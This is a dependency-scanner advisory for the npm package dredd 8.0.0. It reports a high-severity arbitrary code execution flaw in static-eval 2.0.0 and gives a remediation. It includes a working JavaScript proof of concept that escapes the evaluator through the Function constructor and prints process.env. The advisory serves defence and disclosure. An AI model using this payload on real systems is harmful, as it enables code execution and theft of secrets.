dredd@8.0.0

Vulnerabilities 1 via 1 paths
Dependencies 280
Source npm

Find, fix and prevent vulnerabilities in your code.

Severity
  • 1
Status
  • 1
  • 0
  • 0
high severity

Arbitrary Code Execution

  • Vulnerable module: static-eval
  • Introduced through: dredd-transactions@6.5.1

Detailed paths

  • Introduced through: dredd@8.0.0 dredd-transactions@6.5.1 fury-adapter-swagger@0.23.2 json-schema-faker@0.5.0-rc16 jsonpath@1.0.0 static-eval@2.0.0

Overview

static-eval evaluates statically-analyzable expressions.

Affected versions of this package are vulnerable to Arbitrary Code Execution. It passes untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.

Proof of concept

var evaluate = require('static-eval');
var parse = require('esprima').parse;

var src = process.argv[2];
var payload = '(function({x}){return x.constructor})({x:"".sub})("console.log(process.env)")()'
var ast = parse(payload).body[0].expression;
console.log(evaluate(ast, {x:1}));

Remediation

Upgrade static-eval to version 2.0.1 or higher.

References